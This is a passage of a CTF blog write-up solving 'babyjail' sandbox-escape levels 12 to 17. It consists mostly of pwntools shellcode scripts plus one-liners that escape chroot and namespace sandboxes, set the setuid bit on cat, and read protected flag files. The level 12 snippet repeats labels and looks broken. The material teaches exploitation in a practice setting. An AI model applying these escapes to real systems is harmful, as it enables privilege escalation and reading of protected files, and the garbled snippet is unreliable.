<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">verify</span>(<span class="params">index, value</span>):                                                                                              </span><br><span class="line">    sc = asm(<span class="string">f&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    mov edi, 3</span></span><br><span class="line"><span class="string">    lea rsi, [ rip + _buf ]</span></span><br><span class="line"><span class="string">    mov edx, 64</span></span><br><span class="line"><span class="string">    mov eax, 0</span></span><br><span class="line"><span class="string">    syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    cmp byte ptr [ rip + _buf + <span class="subst">&#123;index&#125;</span> ], <span class="subst">&#123;value&#125;</span></span></span><br><span class="line"><span class="string">    je _read</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    _buf: .zero 64</span></span><br><span class="line"><span class="string">    _req: .quad 20, 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    _read:</span></span><br><span class="line"><span class="string">    mov edi, 0</span></span><br><span class="line"><span class="string">    lea rsi, [ rip + _buf ]</span></span><br><span class="line"><span class="string">    mov edx, 64</span></span><br><span class="line"><span class="string">    mov eax, 0</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    cmp byte ptr [ rip + _buf + <span class="subst">&#123;index&#125;</span> ], <span class="subst">&#123;value&#125;</span></span></span><br><span class="line"><span class="string">    je _read</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    _buf: .zero 64</span></span><br><span class="line"><span class="string">    _req: .quad 20, 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    _read:</span></span><br><span class="line"><span class="string">    mov edi, 0</span></span><br><span class="line"><span class="string">    lea rsi, [ rip + _buf ]</span></span><br><span class="line"><span class="string">    mov edx, 64</span></span><br><span class="line"><span class="string">    mov eax, 0</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    _substrate: .zero 8</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">    p = process([<span class="string">&quot;/challenge/babyjail_level12&quot;</span>, <span class="string">&quot;/flag&quot;</span>], alarm=<span class="number">1</span>)</span><br><span class="line">    p.send(sc)</span><br><span class="line">    imm_exit_code = p.poll(block=<span class="literal">True</span>)</span><br><span class="line">    p.kill()</span><br><span class="line">    <span class="keyword">return</span> imm_exit_code == -<span class="number">14</span></span><br></pre></td></tr></table></figure>

<h2 id="Level-13"><a href="#Level-13" class="headerlink" title="Level 13"></a>Level 13</h2><p>in this challenge a parent process would pass the provided shellcode to a sanboxed child process which executes the shellcode and can pass commands for the parent to execute, all syscalls except read, write, and exit are disabled in the child process, we can simply pass command to read the flag into a buffer and then print the buffer</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">shellcode = asm(<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">mov edi, 4</span></span><br><span class="line"><span class="string">lea rsi, [ rip + _command_1 ]</span></span><br><span class="line"><span class="string">mov edx, 15</span></span><br><span class="line"><span class="string">mov eax, 1</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, 4</span></span><br><span class="line"><span class="string">lea rsi, [ rip + _command_2_arg ]</span></span><br><span class="line"><span class="string">mov edx, 64</span></span><br><span class="line"><span class="string">mov eax, 0</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, 4</span></span><br><span class="line"><span class="string">lea rsi, [ rip + _command_2 ]</span></span><br><span class="line"><span class="string">mov edx, eax</span></span><br><span class="line"><span class="string">add edx, 10</span></span><br><span class="line"><span class="string">mov eax, 1</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, eax</span></span><br><span class="line"><span class="string">mov eax, 60</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">_command_1: .ascii &quot;read_file:/flag&quot;</span></span><br><span class="line"><span class="string">_command_2: .ascii &quot;print_msg:&quot;</span></span><br><span class="line"><span class="string">_command_2_arg: .zero 64</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&quot;/challenge/babyjail_level13&quot;</span>)</span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure>

<h2 id="Level-14"><a href="#Level-14" class="headerlink" title="Level 14"></a>Level 14</h2><p>this challenge creates a namespace sandbox but forgets to umount the original root so that we can directly read the flag in it</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> /old/flag</span><br></pre></td></tr></table></figure>

<h2 id="Level-15"><a href="#Level-15" class="headerlink" title="Level 15"></a>Level 15</h2><p>since we can modify the host filesystem in the sandbox, adding the sid bit to <code>cat</code> </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">chmod</span> u+s /bin/cat</span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line"><span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure>

<h2 id="Level-16"><a href="#Level-16" class="headerlink" title="Level 16"></a>Level 16</h2><p>this challenge allows us to access <code>/proc</code> directory in the sandbox, we can find the mount namespace of the host in <code>/proc</code> by <code>file /proc/*/ns/mnt</code> and then enter the host mnt namespace in a forked shell by <code>nsenter --mount=/proc/1/ns/mnt /bin/bash</code> and finally <code>cat /flag</code></p>
<h2 id="Level-17"><a href="#Level-17" class="headerlink" title="Level 17"></a>Level 17</h2><p>this challenge allows us to pass any path except the flag to the sandboxed process from outside and run provided shellcode in the sandboxed process, we can pass the root directory and use <code>openat</code> and <code>sendfile</code> to leak the flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span> </span><br><span class="line">shellcode = asm(<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">mov edi, 3</span></span><br><span class="line"><span class="string">lea rsi, [ rip + _filename ] </span></span><br><span class="line"><span class="string">xor edx, edx</span></span><br><span class="line"><span class="string">xor r10d, r10d</span></span><br><span class="line"><span class="string">mov eax, 257</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, 1</span></span><br><span class="line"><span class="string">mov esi, eax</span></span><br><span class="line"><span class="string">xor edx, edx</span></span><br><span class="line"><span class="string">mov r10d, 64</span></span><br><span class="line"><span class="string">mov eax, 40</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">_filename: .string &quot;flag&quot;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span>)</span><br><span class="line">p = process([<span class="string">&quot;/challenge/babyjail_level17&quot;</span>, <span class="string">&quot;/&quot;</span>])</span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/ctf/">ctf</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="article-nav">
                        
                            <div class="article-prev">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/11/10/tsg-ctf-2023-writeup/"
                                   title="TSG CTF 2023 Writeup"
                                >
                                    <span class="left arrow-icon flex-center">
                                      <i class="fas fa-chevron-left"></i>
                                    </span>
                                            <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">TSG CTF 2023 Writeup</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="article-next">
                                <a class="next"
                                   rel="next"
                                   href="/2023/10/19/welcome/"
                                   title="欢迎"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">欢迎</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                            <span class="right arrow-icon flex-center">
                                      <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                .post-toc-wrap {
  width 100%
  height 100%
  overflow-y auto
  font-size 0.92rem

  &::-webkit-scrollbar-thumb {
    background var(--toc-scrollbar-color)
    border-radius 0.3rem
  }

  &::-webkit-scrollbar-track {
    background transparent
  }

  .post-toc {

    ol {
      position relative
      box-sizing border-box
      margin 0
      text-align left
      list-style none

      a {
        transition-property all
      }
    }


    .nav {

      .nav-item {
        position relative
        box-sizing border-box
        overflow hidden
        line-height 2
        white-space nowrap
        text-overflow ellipsis


        &.active {
          > .nav-child {
            display block
          }
        }


        .nav-link {
          position relative
          box-sizing border-box
          padding-left 0.8rem

          &:hover {
            .nav-number
            .nav-text {
              color var(--primary-color)
            }
          }

          &.active-current {
            > .nav-child {
              display block

              > .nav-item {
                display block
              }
            }


            &::before {
              position absolute
              top 50%
              left 0
              width 0.2rem
              height 1.2rem
              background var(--primary-color)
              border-radius 0.2rem
              transform translateY(-50%)
              content ''
            }

            .nav-number
            .nav-text {
              color var(--primary-color)
            }
          }


          .nav-number
          .nav-text {
            color var(--toc-text-color)
          }
        }


        .nav-child {
          padding-left 1rem


          if (hexo-config('toc') && hexo-config('toc.expand_all') == true) {
            display block
          }
          else {
            display none
          }
        }
      }
    }
  }
}


            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            $shields-style-height = 22px

.footer {
  padding 1rem 0
  color var(--text-color-4)
  font-size 1rem

  a {
    color var(--text-color-4)

    &:hover {
      color var(--primary-color)
    }

    &.no-pointer {
      pointer-events none
    }
  }


  .website-info-box {
    display flex
    flex-direction column
    align-items center
    justify-content center


    &.shields {
      padding 0 1rem

      img {
        height $shields-style-height !important
      }


      a {
        position relative
        display inline-flex
        box-sizing border-box
        text-decoration none
      }


      .shields-item
      .count-box {
        margin 0.3rem 0.2rem
        user-select none
      }
    }


    +keep-mobile() {
      &.shields {
        .shields-item
        .count-box {
          margin 0.12rem -0.3rem
          transform scale(0.9)
          transform-origin center center
        }
      }
    }


    .info-item {
      position relative
      display flex
      flex-wrap wrap
      align-items center
      justify-content center
      box-sizing border-box
      color var(--text-color-4)


      &.shields {
        .count-box {
          display flex
          justify-content flex-start
          height $shields-style-height
          color #f2f2f2
          font-size 12.6px


          .item-type
          .item-value {
            display flex
            align-items center
            height 100%
            padding 0 6px
          }


          .item-type {
            margin-right 0
            background #555555
          }

          .item-value {

            &.uv {
              background coral
            }

            &.pv {
              background orange
            }

            &.word {
              background indianred
            }
          }
        }
      }


      &.default {
        margin 0.2rem 0

        .count-box {
          margin-right 15px

          &::before {
            position absolute
            top 50%
            left -10px
            box-sizing border-box
            transform translateY(-55%)
            content '|'
          }


          &:first-child {
            &::before {
              display none
            }
          }


          &:last-child {
            margin-right 0
          }


          .item-type {
            margin-right 4px
          }
        }
      }


      &.count-item {
        display flex

        .count-box {
          &.uv
          &.pv {
            display none
          }
        }
      }


      &.deploy-info {

        display flex

        a
        .tooltip {
          display flex
          align-items center
        }

        img {
          height 1.08rem
          margin 0 0.4rem
        }
      }
    }
  }


  .icon-animate {
    animation heartbeat-animate 1.2s ease-in-out infinite
  }
}

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        $tools-item-width = 2.2rem
$tools-item-font-size = 1.1rem
$tools-item-border-radius = 0.2rem

.side-tools-show-handle {
  transform translateX(100%)
  opacity 0
  transition-t("transform, opacity", "0, 0", "0.26, 0.26", "linear, linear")

  &.show {
    transform translateX(0)
    opacity 1
  }
}

.side-tools-container {
  .tools-item {
    width $tools-item-width
    height $tools-item-width
    margin-bottom 0.25rem
    color var(--text-color-3)
    font-size $tools-item-font-size
    background var(--background-color-1)
    border-right none
    border-radius $tools-item-border-radius
    box-shadow 0.1rem 0.1rem 0.2rem var(--shadow-color)
    cursor pointer

    i {
      color var(--text-color-3)
    }

    &:hover {
      color var(--background-color-1)
      background var(--primary-color)
      box-shadow 0.2rem 0.2rem 0.4rem var(--shadow-color)

      i {
        color var(--background-color-1)
      }
    }


    +keep-tablet() {
      width $tools-item-width * 0.9
      height $tools-item-width * 0.9
      font-size $tools-item-font-size * 0.9

      &.toggle-show-toc-tablet
      &.go-to-comments-tablet {
        display flex !important
      }
    }

    &.rss {

      a {
        width 100%
        height 100%
        border-radius $tools-item-border-radius

        &:hover {
          color var(--background-color-1)
          background var(--primary-color)
          box-shadow 0.2rem 0.2rem 0.4rem var(--shadow-color)
        }
      }
    }

    &.toggle-show-toc-tablet
    &.go-to-comments-tablet {
      display none
    }
  }


  .exposed-tools-list {

    .tool-scroll-to-top {
      display none

      &.show {
        display flex
      }


      &.show-arrow {
        .percent {
          display none
        }

        .arrow {
          display flex
        }
      }


      &.show-percent {
        .percent {
          display flex
        }

        .arrow {
          display none
        }
      }


      &:hover {
        .percent {
          display none
        }

        .arrow {
          display flex
        }
      }


      .percent {
        font-size 1rem
      }
    }
  }
}

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                .post-toc-wrap {
  width 100%
  height 100%
  overflow-y auto
  font-size 0.92rem

  &::-webkit-scrollbar-thumb {
    background var(--toc-scrollbar-color)
    border-radius 0.3rem
  }

  &::-webkit-scrollbar-track {
    background transparent
  }

  .post-toc {

    ol {
      position relative
      box-sizing border-box
      margin 0
      text-align left
      list-style none

      a {
        transition-property all
      }
    }


    .nav {

      .nav-item {
        position relative
        box-sizing border-box
        overflow hidden
        line-height 2
        white-space nowrap
        text-overflow ellipsis


        &.active {
          > .nav-child {
            display block
          }
        }


        .nav-link {
          position relative
          box-sizing border-box
          padding-left 0.8rem

          &:hover {
            .nav-number
            .nav-text {
              color var(--primary-color)
            }
          }

          &.active-current {
            > .nav-child {
              display block

              > .nav-item {
                display block
              }
            }


            &::before {
              position absolute
              top 50%
              left 0
              width 0.2rem
              height 1.2rem
              background var(--primary-color)
              border-radius 0.2rem
              transform translateY(-50%)
              content ''
            }

            .nav-number
            .nav-text {
              color var(--primary-color)
            }
          }


          .nav-number
          .nav-text {
            color var(--toc-text-color)
          }
        }


        .nav-child {
          padding-left 1rem


          if (hexo-config('toc') && hexo-config('toc.expand_all') == true) {
            display block
          }
          else {
            display none
          }
        }
      }
    }
  }
}


            </div>
        </div>
    
</main>



<!-- common -->
<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/dark-light-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/local-search.js"></script>


<!-- code-block -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/code-block.js"></script>


<!-- lazyload -->


<div class="">
    
        <!-- post-helper -->
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/post/post-helper.js"></script>

        <!-- toc -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/post/toc.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/js/post/share.js"></script>
        
    

    <!-- category-page -->
    

    <!-- links-page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



<script src="/js/long-press-event.js" defer></script>
<script defer>
    const bgm = document.createElement("audio");
    bgm.id = "bgm";
    bgm.src = "/audios/bgm-1.mp3";
    bgm.controls = false;
    bgm.autoplay = false; 
    bgm.style.display = "none";
    bgm.loop = "loop";
    document.body.appendChild(bgm);

    window.onload = function() {
        const widget = document.querySelector("#live2d-widget");
        widget.style.pointerEvents = "auto";
        widget.style.cursor = "url('/images/clef.png') 20 20, auto";
        widget.addEventListener("mousedown", () => {
            const audio_list = ["https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/upclzsolxj/01.%20Praise%20the%20Lamb.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/lbccbknyve/05.%20Faith%20Up.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/biuzbjcrtj/07.%20Saviour.mp3", 
            "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/rxoopwecuw/08.%20Darkwood.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/mwplkyfcej/10.%20Leshy.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/pyrxysussx/11.%20Knucklebones.mp3",
            "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/bmshkiptnt/16.%20Heket.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/shfpubazuq/26.%20Shamura.mp3", "https://vgmsite.com/soundtracks/cult-of-the-lamb-original-soundtrack-2022/cjseknykhh/35.%20The%20One%20Who%20Waits.mp3"];
            bgm.src = audio_list[Math.floor(Math.random() * audio_list.length)];
            bgm.play();
            return false;
        });
        widget.addEventListener("long-press", () => {
            bgm.pause();
            return false;
        });
    };
   
</script>
<script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-koharu@1.0.5/assets/koharu.model.json"},"log":false});</script></body>
</html>
